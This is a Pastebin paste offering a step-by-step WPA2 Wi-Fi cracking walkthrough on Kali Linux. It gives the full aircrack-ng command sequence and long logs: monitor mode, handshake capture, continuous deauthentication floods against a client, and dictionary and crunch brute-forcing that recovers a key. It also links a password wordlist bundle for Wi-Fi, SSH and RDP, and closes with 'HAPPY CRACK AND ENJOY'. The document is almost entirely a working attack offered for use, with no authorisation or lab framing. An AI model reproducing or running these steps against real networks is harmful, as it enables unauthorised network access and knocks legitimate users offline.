Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ______ _ _ _ _ _____ _ _ _
- | ____| | | (_) | | | / ____| | | (_) |
- | |__ __ ___ __ | | ___ _| |_ | |__ _ _ | | _ _| |__ ___ _ __ ___ ___ ___ _ _ _ __ _| |_ _ _
- | __| \ \/ / '_ \| |/ _ \| | __| | '_ \| | | | | | | | | | '_ \ / _ \ '__/ __|/ _ \/ __| | | | '__| | __| | | |
- | |____ > <| |_) | | (_) | | |_ | |_) | |_| | | |___| |_| | |_) | __/ | \__ \ __/ (__| |_| | | | | |_| |_| |
- |______/_/\_\ .__/|_|\___/|_|\__| |_.__/ \__, | \_____\__, |_.__/ \___|_| |___/\___|\___|\__,_|_| |_|\__|\__, |
- | | __/ | __/ | __/ |
- |_| |___/ |___/ |___/
- -------------------------------------------------------------------------------------------------------------------------------------+ # Kali Linux can be used for many things, but it probably is best known for its ability to penetration test, or “hack,” WPA and WPA2 networks. There are hundreds of Windows applications that claim they can hack WPA; don’t get them! They’re just scams, used by professional hackers,into getting hacked themselves. There is only one way that hackers get into your network, and that is with a Linux-based OS, a wireless card capable of monitor mode, and aircrack-ng or similar. Also note that, even with these tools, Wi-Fi cracking is not for beginners. Playing with it requires basic knowledge of how WPA authentication works, and moderate familiarity with Kali Linux and its tools. If you feel you have the necessary skills, let’s begin
- # Download Wordslist.master.rar file Nepaliwifi.txt,Wordslist.txt,ssh_passwd.txt,rdp_passlist.txt and many more txt file zip download
- # Download Link: http://www.mediafire.com/download/wrc43p4mj8fr89r/wordlist-master.rar
- COMMENTS PLEASE CONTACT ME: newfeedback@hotmail.com |
- -------------------------------------------------------------------------------------------------------------------------------------+
- ***************************************************************************************************************************************
- root@kali:~# ifconfig
- eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
- inet 192.168.230.135 netmask 255.255.255.0 broadcast 192.168.230.255
- inet6 fe80::20c:29ff:feaf:90ce prefixlen 64 scopeid 0x20<link>
- ether 00:0c:29:af:90:ce txqueuelen 1000 (Ethernet)
- RX packets 11 bytes 1388 (1.3 KiB)
- RX errors 0 dropped 0 overruns 0 frame 0
- TX packets 36 bytes 3062 (2.9 KiB)
- TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
- lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
- inet 127.0.0.1 netmask 255.0.0.0
- inet6 ::1 prefixlen 128 scopeid 0x10<host>
- loop txqueuelen 0 (Local Loopback)
- RX packets 20 bytes 1200 (1.1 KiB)
- RX errors 0 dropped 0 overruns 0 frame 0
- TX packets 20 bytes 1200 (1.1 KiB)
- TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
- wlan0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
- ether 00:c0:ca:30:0e:fb txqueuelen 1000 (Ethernet)
- RX packets 0 bytes 0 (0.0 B)
- RX errors 0 dropped 0 overruns 0 frame 0
- TX packets 0 bytes 0 (0.0 B)
- TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
- root@kali:~# airmon-ng check kill wlan0
- You have entered an invalid channel "wlan0" which will be ignored
- Killing these processes:
- PID Name
- 697 dhclient
- 945 wpa_supplicant
- root@kali:~# airmon-ng start wlan0
- PHY Interface Driver Chipset
- phy0 wlan0 rtl8187 Realtek Semiconductor Corp. RTL8187
- (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
- (mac80211 station mode vif disabled for [phy0]wlan0)
- root@kali:~# airodump-ng wlan0mon
- CH 9 ][ Elapsed: 36 s ][ 2016-02-26 22:39
- BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
- D8:5D:4C:C0:4C:45 -50 27 0 0 1 54 WPA2 TKIP PSK Android
- BSSID STATION PWR Rate Lost Frames Probe
- ctrl+c
- root@kali:~# airodump-ng -c 1 --bssid D8:5D:4C:C0:4C:45 -w /root/Desktop/android wlan0mon
- CH 1 ][ Elapsed: 2 mins ][ 2016-02-26 22:46
- BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
- D8:5D:4C:C0:4C:45 -54 100 1733 167 0 1 54 WPA2 TKIP PSK Android
- BSSID STATION PWR Rate Lost Frames Probe
- D8:5D:4C:C0:4C:45 94:39:E5:C1:CC:71 -46 54 -54 1 96
- CH 1 ][ Elapsed: 12 mins ][ 2016-02-26 22:55 ][ WPA handshake: D8:5D:4C:C0:4C:45
- BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
- D8:5D:4C:C0:4C:45 -50 100 7056 1473 1 1 54 WPA2 TKIP PSK Android
- BSSID STATION PWR Rate Lost Frames Probe
- D8:5D:4C:C0:4C:45 94:39:E5:C1:CC:71 -45 54 -54 5 14081 Android
- ctrl+c
- root@kali:~#
- root@kali:~# aireplay-ng -0 0 -a D8:5D:4C:C0:4C:45 -c 94:39:E5:C1:CC:71 wlan0mon
- 22:53:21 Waiting for beacon frame (BSSID: D8:5D:4C:C0:4C:45) on channel 1
- 22:53:22 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [21|61 ACKs]
- 22:53:23 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [67|60 ACKs]
- 22:53:24 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|57 ACKs]
- 22:53:24 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|56 ACKs]
- 22:53:25 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [37|62 ACKs]
- 22:53:26 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [53|68 ACKs]
- 22:53:26 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:53:27 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:53:28 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:53:28 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [13|67 ACKs]
- 22:53:29 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:53:29 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:53:30 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:53:31 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [35|64 ACKs]
- 22:53:31 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [52|52 ACKs]
- 22:53:32 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|60 ACKs]
- 22:53:33 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:53:33 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:53:34 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [11|67 ACKs]
- 22:53:35 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|55 ACKs]
- 22:53:35 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|55 ACKs]
- 22:53:36 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|57 ACKs]
- 22:53:37 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [36|59 ACKs]
- 22:53:37 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [54|53 ACKs]
- 22:53:38 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [63|54 ACKs]
- 22:53:39 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [63|58 ACKs]
- 22:53:39 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [61|64 ACKs]
- 22:53:40 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [27|67 ACKs]
- 22:53:41 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:53:41 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:53:42 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:53:43 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [ 8|64 ACKs]
- 22:53:43 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [67|64 ACKs]
- 22:53:44 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:53:45 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:53:45 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [41|62 ACKs]
- 22:53:46 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [43|67 ACKs]
- 22:53:47 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:53:47 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:53:48 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|63 ACKs]
- 22:53:49 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [ 5|64 ACKs]
- 22:53:49 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [67|67 ACKs]
- 22:53:50 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|61 ACKs]
- 22:53:51 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|53 ACKs]
- 22:53:51 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [49|61 ACKs]
- 22:53:52 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [37|60 ACKs]
- 22:53:53 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|61 ACKs]
- 22:53:53 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|62 ACKs]
- 22:53:54 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|63 ACKs]
- 22:53:54 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [ 7|62 ACKs]
- 22:53:55 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [67|65 ACKs]
- 22:53:56 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:53:56 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:53:57 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:53:58 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [24|67 ACKs]
- 22:53:58 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:53:59 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:54:00 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:54:00 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [33|63 ACKs]
- 22:54:01 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [51|66 ACKs]
- 22:54:01 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:54:02 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:54:03 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:54:03 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [15|63 ACKs]
- 22:54:04 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [67|67 ACKs]
- 22:54:04 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:54:05 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:54:06 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:54:06 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [ 4|62 ACKs]
- 22:54:07 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [67|67 ACKs]
- 22:54:08 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:54:08 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|55 ACKs]
- 22:54:09 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [59|64 ACKs]
- 22:54:09 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [24|67 ACKs]
- 22:54:10 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:54:11 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:54:11 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:54:12 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [35|64 ACKs]
- 22:54:12 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [46|67 ACKs]
- 22:54:13 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|58 ACKs]
- 22:54:14 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|55 ACKs]
- 22:54:14 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|57 ACKs]
- 22:54:15 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [ 8|54 ACKs]
- 22:54:16 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [67|54 ACKs]
- 22:54:17 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|51 ACKs]
- 22:54:17 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|55 ACKs]
- 22:54:18 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [10|57 ACKs]
- 22:54:19 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [67|57 ACKs]
- 22:54:19 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|57 ACKs]
- 22:54:20 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|60 ACKs]
- 22:54:21 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [52|58 ACKs]
- 22:54:21 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [33|64 ACKs]
- 22:54:22 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|61 ACKs]
- 22:54:23 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|60 ACKs]
- 22:54:23 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|61 ACKs]
- 22:54:24 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [12|62 ACKs]
- 22:54:25 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [67|62 ACKs]
- 22:54:25 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- 22:54:26 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- root@kali:~# aircrack-ng -a2 -b D8:5D:4C:C0:4C:45 -w /root/Desktop/Wordlist.txt /root/Desktop/*.cap
- Opening /root/Desktop/Wordlist-01.cap
- Reading packets, please wait...
- Aircrack-ng 1.2 rc3
- [00:06:51] 478196 keys tested (1160.52 k/s)
- KEY FOUND! [ Nepal12345 ]
- Master Key : AB 3D 32 52 73 12 7C 05 32 96 7D 49 31 CF 0B A2
- 99 A9 80 89 DF 52 1A 38 29 21 AD 38 A3 36 D0 32
- Transient Key : 1A 4A FF 46 87 56 9D CD 52 AC 7A D6 C5 F9 4C AC
- 4A 69 D5 1F E3 C5 8A 03 C0 29 D9 10 27 A3 0D 7F
- A9 B2 EF B1 FF E8 CE 93 59 C9 E0 80 AF D2 E2 C1
- 92 58 1E 52 12 B6 23 BF 5F BB D0 E5 4F B0 C8 C9
- EAPOL HMAC : 14 83 E3 FC 99 09 DC 84 01 5F 7E 7F BE 07 7B 79
- ***************************************************************************************************************************************
- The different type WIFI CRACK KALI LINUX OS COMMAND LINE TO LEARNING/
- ***************************************************************************************************************************************
- ***************************************************************************************************************************************OTHER COMMAND KALI LINUX TRICKS
- NOTE: WHEN YOU USE COMMAND LINE "directed DeAuth -0" WHO ONE ACCESS TO THE ROUTER ITS DEATH TO BE CONNECT DATA TO ROUTER!
- ***************************************************************************************************************************************
- root@kali:~# airmon-ng check kill
- root@kali:~# airmon-ng
- root@kali:~# airmon-ng start wlan0
- -----------------------------------------------------
- root@kali:~# airodump-ng wlan0mon
- -----------------------------------------------------
- ctrl+c
- root@kali:~# airodump-ng --ignore-negative-one --bssid 00:00:00:00:00 -c 1 -w Android wlan0mon
- ****Android is cap file*****
- root@kali:~# aireplay-ng --deauth 10 --ignore-negative-one -a 00:00:00:00:00 -c 11:22:33:44:55 wlan0mon
- root@kali:~# crunch 8 8 abcdefghijklmnopqrstuvwxyz | aircrack-ng -b 00:00:00:00:00 Android-01.cap -w-
- ===============================================================================================================
- ===============================================================================================================
- root@kali:~# airmon-ng check kill
- root@kali:~# airmon-ng start wlan0
- -----------------------------------------------------------------------------------
- root@kali:~# airodump-ng wlan0mon
- -----------------------------------------------------------------------------------
- ctrl+c
- root@kali:~# airodump-ng -c 1 --bssid D8:5D:4C:C0:4C:45 -w /root/Desktop/Wordlist wlan0mon
- ---------------------------------------------------------------------------------------------
- CH 1 ][ Elapsed: 12 mins ][ 2016-02-26 22:55 ][ WPA handshake: D8:5D:4C:C0:4C:45
- BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
- D8:5D:4C:C0:4C:45 -50 100 7056 1473 1 1 54 WPA2 TKIP PSK Android
- ---------------------------------------------------------------------------------------------
- root@kali:~# aireplay-ng -0 5 -a D8:5D:4C:C0:4C:45 -c 94:39:E5:C1:CC:71 wlan0mon
- ----------------------------------------------------------------------------------
- 22:53:21 Waiting for beacon frame (BSSID: D8:5D:4C:C0:4C:45) on channel 1
- 22:53:22 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [21|61 ACKs]
- 22:53:23 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [67|60 ACKs]
- 22:53:24 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|57 ACKs]
- 22:53:24 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|56 ACKs]
- 22:53:25 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [37|62 ACKs]
- 22:53:26 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [53|68 ACKs]
- 22:53:26 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
- root@kali:~# aircrack-ng -a2 -b D8:5D:4C:C0:4C:45 -w /root/Desktop/Wordlist.txt /root/Desktop/*.cap
- ------------------------------------------------------------------------------------------------------------
- pening /root/Desktop/Wordlist-01.cap
- Reading packets, please wait...
- Aircrack-ng 1.2 rc3
- [00:06:51] 478196 keys tested (1160.52 k/s)
- KEY FOUND! [ Nepal12345 ]
- Master Key : AB 3D 32 52 73 12 7C 05 32 96 7D 49 31 CF 0B A2
- 99 A9 80 89 DF 52 1A 38 29 21 AD 38 A3 36 D0 32
- Transient Key : 1A 4A FF 46 87 56 9D CD 52 AC 7A D6 C5 F9 4C AC
- 4A 69 D5 1F E3 C5 8A 03 C0 29 D9 10 27 A3 0D 7F
- A9 B2 EF B1 FF E8 CE 93 59 C9 E0 80 AF D2 E2 C1
- 92 58 1E 52 12 B6 23 BF 5F BB D0 E5 4F B0 C8 C9
- EAPOL HMAC : 14 83 E3 FC 99 09 DC 84 01 5F 7E 7F BE 07 7B 79
- ***************************************************************************************************************************************
- aireplay command help
- ----------------------
- root@kali:~# aireplay-ng --help
- Aireplay-ng 1.2 rc3 - (C) 2006-2015 Thomas d'Otreppe
- http://www.aircrack-ng.org
- usage: aireplay-ng <options> <replay interface>
- Filter options:
- -b bssid : MAC address, Access Point
- -d dmac : MAC address, Destination
- -s smac : MAC address, Source
- -m len : minimum packet length
- -n len : maximum packet length
- -u type : frame control, type field
- -v subt : frame control, subtype field
- -t tods : frame control, To DS bit
- -f fromds : frame control, From DS bit
- -w iswep : frame control, WEP bit
- -D : disable AP detection
- Replay options:
- -x nbpps : number of packets per second
- -p fctrl : set frame control word (hex)
- -a bssid : set Access Point MAC address
- -c dmac : set Destination MAC address
- -h smac : set Source MAC address
- -g value : change ring buffer size (default: 8)
- -F : choose first matching packet
- Fakeauth attack options:
- -e essid : set target AP SSID
- -o npckts : number of packets per burst (0=auto, default: 1)
- -q sec : seconds between keep-alives
- -Q : send reassociation requests
- -y prga : keystream for shared key auth
- -T n : exit after retry fake auth request n time
- Arp Replay attack options:
- -j : inject FromDS packets
- Fragmentation attack options:
- -k IP : set destination IP in fragments
- -l IP : set source IP in fragments
- Test attack options:
- -B : activates the bitrate test
- Source options:
- -i iface : capture packets from this interface
- -r file : extract packets from this pcap file
- Miscellaneous options:
- -R : disable /dev/rtc usage
- --ignore-negative-one : if the interface's channel can't be determined,
- ignore the mismatch, needed for unpatched cfg80211
- Attack modes (numbers can still be used):
- --deauth count : deauthenticate 1 or all stations (-0)
- --fakeauth delay : fake authentication with AP (-1)
- --interactive : interactive frame selection (-2)
- --arpreplay : standard ARP-request replay (-3)
- --chopchop : decrypt/chopchop WEP packet (-4)
- --fragment : generates valid keystream (-5)
- --caffe-latte : query a client for new IVs (-6)
- --cfrag : fragments against a client (-7)
- --migmode : attacks WPA migration mode (-8)
- --test : tests injection and quality (-9)
- --help : Displays this usage screen
- ***************************************************************************************************************************************
- WIFI CRACK TECHNI WIT KALI LINUX OS HAPPY CRACK AND ENJOY BY EXPLOIT BY CYBERSECURITY!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement